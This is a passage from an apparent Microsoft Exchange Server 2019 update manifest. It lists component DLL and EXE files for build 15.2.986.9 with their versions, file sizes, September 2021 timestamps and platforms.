29-Sep-21| 20:15| x86 \nMicrosoft.exchange.connections.pop.dll| 15.2.986.9| 71,048| 29-Sep-21| 20:15| x86 \nMicrosoft.exchange.contentfilter.wrapper.exe| 15.2.986.9| 203,656| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.context.client.dll| 15.2.986.9| 27,024| 29-Sep-21| 20:50| x86 \nMicrosoft.exchange.context.configuration.dll| 15.2.986.9| 51,576| 29-Sep-21| 20:01| x86 \nMicrosoft.exchange.context.core.dll| 15.2.986.9| 51,576| 29-Sep-21| 20:23| x86 \nMicrosoft.exchange.context.datamodel.dll| 15.2.986.9| 46,968| 29-Sep-21| 20:22| x86 \nMicrosoft.exchange.core.strings.dll| 15.2.986.9| 1,093,520| 29-Sep-21| 19:50| x86 \nMicrosoft.exchange.core.timezone.dll| 15.2.986.9| 57,224| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.data.applicationlogic.deep.dll| 15.2.986.9| 326,520| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.data.applicationlogic.dll| 15.2.986.9| 3,357,072| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.data.applicationlogic.eventlog.dll| 15.2.986.9| 35,720| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.data.applicationlogic.monitoring.ifx.dll| 15.2.986.9| 17,784| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.data.connectors.dll| 15.2.986.9| 165,264| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.data.consumermailboxprovisioning.dll| 15.2.986.9| 619,408| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.data.directory.dll| 15.2.986.9| 7,800,720| 29-Sep-21| 20:24| x86 \nMicrosoft.exchange.data.directory.eventlog.dll| 15.2.986.9| 80,248| 29-Sep-21| 19:50| x64 \nMicrosoft.exchange.data.dll| 15.2.986.9| 1,967,992| 29-Sep-21| 20:18| x86 \nMicrosoft.exchange.data.groupmailboxaccesslayer.dll| 15.2.986.9| 1,631,608| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.data.ha.dll| 15.2.986.9| 377,744| 29-Sep-21| 20:28| x86 \nMicrosoft.exchange.data.imageanalysis.dll| 15.2.986.9| 105,360| 29-Sep-21| 19:58| x86 \nMicrosoft.exchange.data.mailboxfeatures.dll| 15.2.986.9| 15,760| 29-Sep-21| 20:35| x86 \nMicrosoft.exchange.data.mailboxloadbalance.dll| 15.2.986.9| 224,656| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.data.mapi.dll| 15.2.986.9| 186,768| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.data.metering.contracts.dll| 15.2.986.9| 39,816| 29-Sep-21| 19:50| x86 \nMicrosoft.exchange.data.metering.dll| 15.2.986.9| 119,184| 29-Sep-21| 19:58| x86 \nMicrosoft.exchange.data.msosyncxsd.dll| 15.2.986.9| 968,080| 29-Sep-21| 19:52| x86 \nMicrosoft.exchange.data.notification.dll| 15.2.986.9| 141,200| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.data.personaldataplatform.dll| 15.2.986.9| 769,400| 29-Sep-21| 20:15| x86 \nMicrosoft.exchange.data.providers.dll| 15.2.986.9| 139,664| 29-Sep-21| 20:35| x86 \nMicrosoft.exchange.data.provisioning.dll| 15.2.986.9| 56,696| 29-Sep-21| 20:25| x86 \nMicrosoft.exchange.data.rightsmanagement.dll| 15.2.986.9| 452,472| 29-Sep-21| 20:28| x86 \nMicrosoft.exchange.data.scheduledtimers.dll| 15.2.986.9| 32,656| 29-Sep-21| 20:35| x86 \nMicrosoft.exchange.data.storage.clientstrings.dll| 15.2.986.9| 256,904| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.data.storage.dll| 15.2.986.9| #########| 29-Sep-21| 20:34| x86 \nMicrosoft.exchange.data.storage.eventlog.dll| 15.2.986.9| 37,776| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.data.storageconfigurationresources.dll| 15.2.986.9| 655,752| 29-Sep-21| 19:50| x86 \nMicrosoft.exchange.data.storeobjects.dll| 15.2.986.9| 175,480| 29-Sep-21| 20:28| x86 \nMicrosoft.exchange.data.throttlingservice.client.dll| 15.2.986.9| 36,216| 29-Sep-21| 20:28| x86 \nMicrosoft.exchange.data.throttlingservice.client.eventlog.dll| 15.2.986.9| 14,224| 29-Sep-21| 19:44| x64 \nMicrosoft.exchange.data.throttlingservice.eventlog.dll| 15.2.986.9| 14,224| 29-Sep-21| 19:48| x64 \nMicrosoft.exchange.datacenter.management.activemonitoring.recoveryservice.eventlog.dll| 15.2.986.9| 14,728| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.datacenterstrings.dll| 15.2.986.9| 72,576| 29-Sep-21| 21:38| x86 \nMicrosoft.exchange.delivery.eventlog.dll| 15.2.986.9| 13,192| 29-Sep-21| 19:50| x64 \nMicrosoft.exchange.diagnostics.certificatelogger.dll| 15.2.986.9| 22,928| 29-Sep-21| 20:31| x86 \nMicrosoft.exchange.diagnostics.dll| 15.2.986.9| 1,815,944| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.diagnostics.dll.deploy| 15.2.986.9| 1,815,944| 29-Sep-21| 19:47| Not applicable \nMicrosoft.exchange.diagnostics.performancelogger.dll| 15.2.986.9| 23,928| 29-Sep-21| 20:15| x86 \nMicrosoft.exchange.diagnostics.service.common.dll| 15.2.986.9| 546,680| 29-Sep-21| 20:01| x86 \nMicrosoft.exchange.diagnostics.service.eventlog.dll| 15.2.986.9| 215,440| 29-Sep-21| 19:48| x64 \nMicrosoft.exchange.diagnostics.service.exchangejobs.dll| 15.2.986.9| 194,424| 29-Sep-21| 20:50| x86 \nMicrosoft.exchange.diagnostics.service.exe| 15.2.986.9| 146,296| 29-Sep-21| 20:28| x86 \nMicrosoft.exchange.diagnostics.service.fuseboxperfcounters.dll| 15.2.986.9| 27,512| 29-Sep-21| 20:15| x86 \nMicrosoft.exchange.diagnosticsaggregation.eventlog.dll| 15.2.986.9| 13,688| 29-Sep-21| 19:50| x64 \nMicrosoft.exchange.diagnosticsaggregationservicelet.dll| 15.2.986.9| 49,544| 29-Sep-21| 21:06| x86 \nMicrosoft.exchange.directory.topologyservice.eventlog.dll| 15.2.986.9| 28,048| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.directory.topologyservice.exe| 15.2.986.9| 208,776| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.disklocker.events.dll| 15.2.986.9| 88,976| 29-Sep-21| 19:44| x64 \nMicrosoft.exchange.disklocker.interop.dll| 15.2.986.9| 32,648| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.drumtesting.calendarmigration.dll| 15.2.986.9| 45,968| 29-Sep-21| 21:17| x86 \nMicrosoft.exchange.drumtesting.common.dll| 15.2.986.9| 18,832| 29-Sep-21| 21:14| x86 \nMicrosoft.exchange.dxstore.dll| 15.2.986.9| 473,480| 29-Sep-21| 20:15| x86 \nMicrosoft.exchange.dxstore.ha.events.dll| 15.2.986.9| 206,216| 29-Sep-21| 19:44| x64 \nMicrosoft.exchange.dxstore.ha.instance.exe| 15.2.986.9| 36,752| 29-Sep-21| 21:10| x86 \nMicrosoft.exchange.eac.flighting.dll| 15.2.986.9| 131,472| 29-Sep-21| 20:00| x86 \nMicrosoft.exchange.edgecredentialsvc.exe| 15.2.986.9| 21,896| 29-Sep-21| 20:28| x86 \nMicrosoft.exchange.edgesync.common.dll| 15.2.986.9| 148,360| 29-Sep-21| 20:31| x86 \nMicrosoft.exchange.edgesync.datacenterproviders.dll| 15.2.986.9| 220,048| 29-Sep-21| 20:34| x86 \nMicrosoft.exchange.edgesync.eventlog.dll| 15.2.986.9| 23,952| 29-Sep-21| 19:50| x64 \nMicrosoft.exchange.edgesyncsvc.exe| 15.2.986.9| 97,680| 29-Sep-21| 20:34| x86 \nMicrosoft.exchange.ediscovery.export.dll| 15.2.986.9| 1,266,056| 29-Sep-21| 19:48| x86 \nMicrosoft.exchange.ediscovery.export.dll.deploy| 15.2.986.9| 1,266,056| 29-Sep-21| 19:48| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.application| Not applicable| 16,500| 29-Sep-21| 19:58| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.exe.deploy| 15.2.986.9| 87,440| 29-Sep-21| 19:52| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.manifest| Not applicable| 67,455| 29-Sep-21| 19:52| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.strings.dll.deploy| 15.2.986.9| 52,104| 29-Sep-21| 19:47| Not applicable \nMicrosoft.exchange.ediscovery.mailboxsearch.dll| 15.2.986.9| 292,216| 29-Sep-21| 21:25| x86 \nMicrosoft.exchange.entities.birthdaycalendar.dll| 15.2.986.9| 72,568| 29-Sep-21| 21:15| x86 \nMicrosoft.exchange.entities.booking.defaultservicesettings.dll| 15.2.986.9| 45,968| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.entities.booking.dll| 15.2.986.9| 217,992| 29-Sep-21| 21:17| x86 \nMicrosoft.exchange.entities.booking.management.dll| 15.2.986.9| 78,224| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.entities.bookings.dll| 15.2.986.9| 35,728| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.entities.calendaring.dll| 15.2.986.9| 934,776| 29-Sep-21| 21:12| x86 \nMicrosoft.exchange.entities.common.dll| 15.2.986.9| 336,272| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.entities.connectors.dll| 15.2.986.9| 52,616| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.entities.contentsubmissions.dll| 15.2.986.9| 32,144| 29-Sep-21| 20:51| x86 \nMicrosoft.exchange.entities.context.dll| 15.2.986.9| 60,808| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.entities.datamodel.dll| 15.2.986.9| 854,408| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.entities.fileproviders.dll| 15.2.986.9| 290,680| 29-Sep-21| 21:16| x86 \nMicrosoft.exchange.entities.foldersharing.dll| 15.2.986.9| 39,312| 29-Sep-21| 20:51| x86 \nMicrosoft.exchange.entities.holidaycalendars.dll| 15.2.986.9| 76,152| 29-Sep-21| 21:15| x86 \nMicrosoft.exchange.entities.insights.dll| 15.2.986.9| 166,800| 29-Sep-21| 21:22| x86 \nMicrosoft.exchange.entities.meetinglocation.dll| 15.2.986.9| 1,486,712| 29-Sep-21| 21:22| x86 \nMicrosoft.exchange.entities.meetingparticipants.dll| 15.2.986.9| 122,232| 29-Sep-21| 21:17| x86 \nMicrosoft.exchange.entities.meetingtimecandidates.dll| 15.2.986.9| #########| 29-Sep-21| 21:26| x86 \nMicrosoft.exchange.entities.onlinemeetings.dll| 15.2.986.9| 263,568| 29-Sep-21| 20:54| x86 \nMicrosoft.exchange.entities.people.dll| 15.2.986.9| 37,768| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.entities.peopleinsights.dll| 15.2.986.9| 186,744| 29-Sep-21| 21:15| x86 \nMicrosoft.exchange.entities.reminders.dll| 15.2.986.9| 64,376| 29-Sep-21| 21:16| x86 \nMicrosoft.exchange.entities.schedules.dll| 15.2.986.9| 83,848| 29-Sep-21| 21:17| x86 \nMicrosoft.exchange.entities.shellservice.dll| 15.2.986.9| 63,888| 29-Sep-21| 20:35| x86 \nMicrosoft.exchange.entities.tasks.dll| 15.2.986.9| 99,704| 29-Sep-21| 20:54| x86 \nMicrosoft.exchange.entities.xrm.dll| 15.2.986.9| 144,784| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.entityextraction.calendar.dll| 15.2.986.9| 270,200| 29-Sep-21| 21:15| x86 \nMicrosoft.exchange.eserepl.common.dll| 15.2.986.9| 15,240| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.eserepl.configuration.dll| 15.2.986.9| 15,736| 29-Sep-21| 20:02| x86 \nMicrosoft.exchange.eserepl.dll| 15.2.986.9| 131,960| 29-Sep-21| 20:22| x86 \nMicrosoft.exchange.ews.configuration.dll| 15.2.986.9| 254,352| 29-Sep-21| 20:35| x86 \nMicrosoft.exchange.exchangecertificate.eventlog.dll| 15.2.986.9| 13,184| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.exchangecertificateservicelet.dll| 15.2.986.9| 37,256| 29-Sep-21| 21:35| x86 \nMicrosoft.exchange.extensibility.internal.dll| 15.2.986.9| 641,928| 29-Sep-21| 20:15| x86 \nMicrosoft.exchange.extensibility.partner.dll| 15.2.986.9| 37,264| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.federateddirectory.dll| 15.2.986.9| 146,312| 29-Sep-21| 21:45| x86 \nMicrosoft.exchange.ffosynclogmsg.dll| 15.2.986.9| 13,176| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.frontendhttpproxy.dll| 15.2.986.9| 596,856| 29-Sep-21| 21:44| x86 \nMicrosoft.exchange.frontendhttpproxy.eventlogs.dll| 15.2.986.9| 14,712| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.frontendtransport.monitoring.dll| 15.2.986.9| 30,072| 29-Sep-21| 22:24| x86 \nMicrosoft.exchange.griffin.variantconfiguration.dll| 15.2.986.9| 99,728| 29-Sep-21| 19:59| x86 \nMicrosoft.exchange.hathirdpartyreplication.dll| 15.2.986.9| 42,376| 29-Sep-21| 19:50| x86 \nMicrosoft.exchange.helpprovider.dll| 15.2.986.9| 40,840| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.httpproxy.addressfinder.dll| 15.2.986.9| 54,144| 29-Sep-21| 21:08| x86 \nMicrosoft.exchange.httpproxy.common.dll| 15.2.986.9| 164,240| 29-Sep-21| 20:50| x86 \nMicrosoft.exchange.httpproxy.diagnostics.dll| 15.2.986.9| 58,768| 29-Sep-21| 21:06| x86 \nMicrosoft.exchange.httpproxy.flighting.dll| 15.2.986.9| 204,688| 29-Sep-21| 20:00| x86 \nMicrosoft.exchange.httpproxy.passivemonitor.dll| 15.2.986.9| 17,784| 29-Sep-21| 20:22| x86 \nMicrosoft.exchange.httpproxy.proxyassistant.dll| 15.2.986.9| 30,600| 29-Sep-21| 21:08| x86 \nMicrosoft.exchange.httpproxy.routerefresher.dll| 15.2.986.9| 38,800| 29-Sep-21| 21:10| x86 \nMicrosoft.exchange.httpproxy.routeselector.dll| 15.2.986.9| 48,520| 29-Sep-21| 21:08| x86 \nMicrosoft.exchange.httpproxy.routing.dll| 15.2.986.9| 180,616| 29-Sep-21| 20:54| x86 \nMicrosoft.exchange.httpredirectmodules.dll| 15.2.986.9| 36,728| 29-Sep-21| 21:44| x86 \nMicrosoft.exchange.httprequestfiltering.dll| 15.2.986.9| 28,040| 29-Sep-21| 20:02| x86 \nMicrosoft.exchange.httputilities.dll| 15.2.986.9| 25,992| 29-Sep-21| 21:09| x86 \nMicrosoft.exchange.hygiene.data.dll| 15.2.986.9| 1,868,176| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.hygiene.diagnosisutil.dll| 15.2.986.9| 54,648| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.hygiene.eopinstantprovisioning.dll| 15.2.986.9| 35,728| 29-Sep-21| 21:37| x86 \nMicrosoft.exchange.idserialization.dll| 15.2.986.9| 35,704| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.imap4.eventlog.dll| 15.2.986.9| 18,296| 29-Sep-21| 19:50| x64 \nMicrosoft.exchange.imap4.eventlog.dll.fe| 15.2.986.9| 18,296| 29-Sep-21| 19:50| Not applicable \nMicrosoft.exchange.imap4.exe| 15.2.986.9| 262,520| 29-Sep-21| 20:54| x86 \nMicrosoft.exchange.imap4.exe.fe| 15.2.986.9| 262,520| 29-Sep-21| 20:54| Not applicable \nMicrosoft.exchange.imap4service.exe| 15.2.986.9| 24,968| 29-Sep-21| 20:50| x86 \nMicrosoft.exchange.imap4service.exe.fe| 15.2.986.9| 24,968| 29-Sep-21| 20:50| Not applicable \nMicrosoft.exchange.imapconfiguration.dl1| 15.2.986.9| 53,136| 29-Sep-21| 20:01| Not applicable \nMicrosoft.exchange.inference.common.dll| 15.2.986.9| 216,976| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.inference.hashtagsrelevance.dll| 15.2.986.9| 32,144| 29-Sep-21| 21:21| x64 \nMicrosoft.exchange.inference.peoplerelevance.dll| 15.2.986.9| 281,992| 29-Sep-21| 21:19| x86 \nMicrosoft.exchange.inference.ranking.dll| 15.2.986.9| 18,832| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.inference.safetylibrary.dll| 15.2.986.9| 83,832| 29-Sep-21| 21:16| x86 \nMicrosoft.exchange.inference.service.eventlog.dll| 15.2.986.9| 15,240| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.infoworker.assistantsclientresources.dll| 15.2.986.9| 94,096| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.infoworker.common.dll| 15.2.986.9| 1,839,992| 29-Sep-21| 21:06| x86 \nMicrosoft.exchange.infoworker.eventlog.dll| 15.2.986.9| 71,544| 29-Sep-21| 19:50| x64 \nMicrosoft.exchange.infoworker.meetingvalidator.dll| 15.2.986.9| 175,480| 29-Sep-21| 21:08| x86 \nMicrosoft.exchange.instantmessaging.dll| 15.2.986.9| 45,960| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.irm.formprotector.dll| 15.2.986.9| 159,632| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.irm.msoprotector.dll| 15.2.986.9| 51,088| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.irm.ofcprotector.dll| 15.2.986.9| 45,944| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.isam.databasemanager.dll| 15.2.986.9| 32,144| 29-Sep-21| 20:00| x86 \nMicrosoft.exchange.isam.esebcli.dll| 15.2.986.9| 100,232| 29-Sep-21| 19:52| x64 \nMicrosoft.exchange.jobqueue.eventlog.dll| 15.2.986.9| 13,200| 29-Sep-21| 19:50| x64 \nMicrosoft.exchange.jobqueueservicelet.dll| 15.2.986.9| 271,248| 29-Sep-21| 21:48| x86 \nMicrosoft.exchange.killswitch.dll| 15.2.986.9| 22,408| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.killswitchconfiguration.dll| 15.2.986.9| 33,680| 29-Sep-21| 20:01| x86 \nMicrosoft.exchange.loganalyzer.analyzers.auditing.dll| 15.2.986.9| 18,312| 29-Sep-21| 19:50| x86 \nMicrosoft.exchange.loganalyzer.analyzers.certificatelog.dll| 15.2.986.9| 15,240| 29-Sep-21| 19:50| x86 \nMicrosoft.exchange.loganalyzer.analyzers.cmdletinfralog.dll| 15.2.986.9| 27,512| 29-Sep-21| 19:52| x86 \nMicrosoft.exchange.loganalyzer.analyzers.easlog.dll| 15.2.986.9| 30,600| 29-Sep-21| 20:28| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ecplog.dll| 15.2.986.9| 22,392| 29-Sep-21| 19:52| x86 \nMicrosoft.exchange.loganalyzer.analyzers.eventlog.dll| 15.2.986.9| 66,440| 29-Sep-21| 20:28| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ewslog.dll| 15.2.986.9| 29,576| 29-Sep-21| 19:52| x86 \nMicrosoft.exchange.loganalyzer.analyzers.griffinperfcounter.dll| 15.2.986.9| 19,848| 29-Sep-21| 20:28| x86 \nMicrosoft.exchange.loganalyzer.analyzers.groupescalationlog.dll| 15.2.986.9| 20,360| 29-Sep-21| 19:50| x86 \nMicrosoft.exchange.loganalyzer.analyzers.httpproxylog.dll| 15.2.986.9| 19,336| 29-Sep-21| 20:28| x86 \nMicrosoft.exchange.loganalyzer.analyzers.hxservicelog.dll| 15.2.986.9| 34,192| 29-Sep-21| 20:30| x86 \nMicrosoft.exchange.loganalyzer.analyzers.iislog.dll| 15.2.986.9| 103,816| 29-Sep-21| 19:50| x86 \nMicrosoft.exchange.loganalyzer.analyzers.lameventlog.dll| 15.2.986.9| 31,616| 29-Sep-21| 20:28| x86 \nMicrosoft.exchange.loganalyzer.analyzers.migrationlog.dll| 15.2.986.9| 15,752| 29-Sep-21| 19:50| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll| 15.2.986.9| 20,864| 29-Sep-21| 20:28| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oauthcafelog.dll| 15.2.986.9| 16,264| 29-Sep-21| 19:58| x86 \nMicrosoft.exchange.loganalyzer.analyzers.outlookservicelog.dll| 15.2.986.9| 49,032| 29-Sep-21| 20:28| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owaclientlog.dll| 15.2.986.9| 44,424| 29-Sep-21| 20:28| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owalog.dll| 15.2.986.9| 38,280| 29-Sep-21| 19:52| x86 \nMicrosoft.exchange.loganalyzer.analyzers.perflog.dll| 15.2.986.9| #########| 29-Sep-21| 20:28| x86 \nMicrosoft.exchange.loganalyzer.analyzers.pfassistantlog.dll| 15.2.986.9| 29,048| 29-Sep-21| 19:52| x86 \nMicrosoft.exchange.loganalyzer.analyzers.rca.dll| 15.2.986.9| 21,368| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.loganalyzer.analyzers.restlog.dll| 15.2.986.9| 24,456| 29-Sep-21| 20:28| x86 \nMicrosoft.exchange.loganalyzer.analyzers.store.dll| 15.2.986.9| 15,240| 29-Sep-21| 20:28| x86 \nMicrosoft.exchange.loganalyzer.analyzers.transportsynchealthlog.dll| 15.2.986.9| 21,888| 29-Sep-21| 19:50| x86 \nMicrosoft.exchange.loganalyzer.core.dll| 15.2.986.9| 89,488| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.loganalyzer.extensions.auditing.dll| 15.2.986.9| 20,856| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.loganalyzer.extensions.certificatelog.dll| 15.2.986.9| 26,488| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.loganalyzer.extensions.cmdletinfralog.dll| 15.2.986.9| 21,368| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.loganalyzer.extensions.common.dll| 15.2.986.9| 28,048| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.loganalyzer.extensions.easlog.dll| 15.2.986.9| 28,552| 29-Sep-21| 19:50| x86 \nMicrosoft.exchange.loganalyzer.extensions.errordetection.dll| 15.2.986.9| 36,232| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.loganalyzer.extensions.ewslog.dll| 15.2.986.9| 16,760| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.loganalyzer.extensions.griffinperfcounter.dll| 15.2.986.9| 19,848| 29-Sep-21| 19:50| x86 \nMicrosoft.exchange.loganalyzer.extensions.groupescalationlog.dll| 15.2.986.9| 15,224| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.loganalyzer.extensions.httpproxylog.dll| 15.2.986.9| 17,288| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.loganalyzer.extensions.hxservicelog.dll| 15.2.986.9| 19,832| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.loganalyzer.extensions.iislog.dll| 15.2.986.9| 57,224| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.loganalyzer.extensions.migrationlog.dll| 15.2.986.9| 17,784| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.loganalyzer.extensions.oabdownloadlog.dll| 15.2.986.9| 18,832| 29-Sep-21| 20:28| x86 \nMicrosoft.exchange.loganalyzer.extensions.oauthcafelog.dll| 15.2.986.9| 16,248| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.loganalyzer.extensions.outlookservicelog.dll| 15.2.986.9| 17,784| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.loganalyzer.extensions.owaclientlog.dll| 15.2.986.9| 15,248| 29-Sep-21| 19:52| x86 \nMicrosoft.exchange.loganalyzer.extensions.owalog.dll| 15.2.986.9| 15,224| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.loganalyzer.extensions.perflog.dll| 15.2.986.9| 52,616| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.loganalyzer.extensions.pfassistantlog.dll| 15.2.986.9| 18,296| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.loganalyzer.extensions.rca.dll| 15.2.986.9| 34,184| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.loganalyzer.extensions.restlog.dll| 15.2.986.9| 17,272| 29-Sep-21| 20:28| x86 \nMicrosoft.exchange.loganalyzer.extensions.store.dll| 15.2.986.9| 18,824| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.loganalyzer.extensions.transportsynchealthlog.dll| 15.2.986.9| 43,384| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.loguploader.dll| 15.2.986.9| 165,264| 29-Sep-21| 20:15| x86 \nMicrosoft.exchange.loguploaderproxy.dll| 15.2.986.9| 54,664| 29-Sep-21| 20:15| x86 \nMicrosoft.exchange.mailboxassistants.assistants.dll| 15.2.986.9| 9,060,232| 29-Sep-21| 22:14| x86 \nMicrosoft.exchange.mailboxassistants.attachmentthumbnail.dll| 15.2.986.9| 33,168| 29-Sep-21| 20:54| x86 \nMicrosoft.exchange.mailboxassistants.common.dll| 15.2.986.9| 124,280| 29-Sep-21| 21:09| x86 \nMicrosoft.exchange.mailboxassistants.crimsonevents.dll| 15.2.986.9| 82,824| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.mailboxassistants.eventlog.dll| 15.2.986.9| 14,200| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.mailboxassistants.rightsmanagement.dll| 15.2.986.9| 30,072| 29-Sep-21| 21:11| x86 \nMicrosoft.exchange.mailboxloadbalance.dll| 15.2.986.9| 661,384| 29-Sep-21| 21:22| x86 \nMicrosoft.exchange.mailboxloadbalance.serverstrings.dll| 15.2.986.9| 63,352| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.mailboxreplicationservice.calendarsyncprovider.dll| 15.2.986.9| 175,504| 29-Sep-21| 21:14| x86 \nMicrosoft.exchange.mailboxreplicationservice.common.dll| 15.2.986.9| 2,793,360| 29-Sep-21| 21:11| x86 \nMicrosoft.exchange.mailboxreplicationservice.complianceprovider.dll| 15.2.986.9| 53,136| 29-Sep-21| 21:13| x86 \nMicrosoft.exchange.mailboxreplicationservice.contactsyncprovider.dll| 15.2.986.9| 151,432| 29-Sep-21| 21:13| x86 \nMicrosoft.exchange.mailboxreplicationservice.dll| 15.2.986.9| 967,560| 29-Sep-21| 21:20| x86 \nMicrosoft.exchange.mailboxreplicationservice.easprovider.dll| 15.2.986.9| 185,232| 29-Sep-21| 21:13| x86 \nMicrosoft.exchange.mailboxreplicationservice.eventlog.dll| 15.2.986.9| 31,624| 29-Sep-21| 19:50| x64 \nMicrosoft.exchange.mailboxreplicationservice.googledocprovider.dll| 15.2.986.9| 39,824| 29-Sep-21| 21:13| x86 \nMicrosoft.exchange.mailboxreplicationservice.imapprovider.dll| 15.2.986.9| 105,872| 29-Sep-21| 21:13| x86 \nMicrosoft.exchange.mailboxreplicationservice.mapiprovider.dll| 15.2.986.9| 95,120| 29-Sep-21| 21:13| x86 \nMicrosoft.exchange.mailboxreplicationservice.popprovider.dll| 15.2.986.9| 43,408| 29-Sep-21| 21:13| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyclient.dll| 15.2.986.9| 18,808| 29-Sep-21| 19:58| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 15.2.986.9| 172,936| 29-Sep-21| 21:20| x86 \nMicrosoft.exchange.mailboxreplicationservice.pstprovider.dll| 15.2.986.9| 102,288| 29-Sep-21| 21:13| x86 \nMicrosoft.exchange.mailboxreplicationservice.remoteprovider.dll| 15.2.986.9| 98,704| 29-Sep-21| 21:13| x86 \nMicrosoft.exchange.mailboxreplicationservice.storageprovider.dll| 15.2.986.9| 188,792| 29-Sep-21| 21:15| x86 \nMicrosoft.exchange.mailboxreplicationservice.syncprovider.dll| 15.2.986.9| 43,384| 29-Sep-21| 21:16| x86 \nMicrosoft.exchange.mailboxreplicationservice.xml.dll| 15.2.986.9| 447,368| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.mailboxreplicationservice.xrmprovider.dll| 15.2.986.9| 89,976| 29-Sep-21| 21:17| x86 \nMicrosoft.exchange.mailboxtransport.monitoring.dll| 15.2.986.9| 107,896| 29-Sep-21| 22:24| x86 \nMicrosoft.exchange.mailboxtransport.storedriveragents.dll| 15.2.986.9| 371,080| 29-Sep-21| 21:25| x86 \nMicrosoft.exchange.mailboxtransport.storedrivercommon.dll| 15.2.986.9| 193,936| 29-Sep-21| 21:06| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.dll| 15.2.986.9| 551,816| 29-Sep-21| 21:10| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll| 15.2.986.9| 16,272| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.mailboxtransport.submission.eventlog.dll| 15.2.986.9| 15,760| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.dll| 15.2.986.9| 320,912| 29-Sep-21| 21:17| x86 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll| 15.2.986.9| 17,808| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.mailboxtransport.syncdelivery.dll| 15.2.986.9| 45,448| 29-Sep-21| 21:07| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.dll| 15.2.986.9| 18,320| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll| 15.2.986.9| 12,680| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.managedlexruntime.mppgruntime.dll| 15.2.986.9| 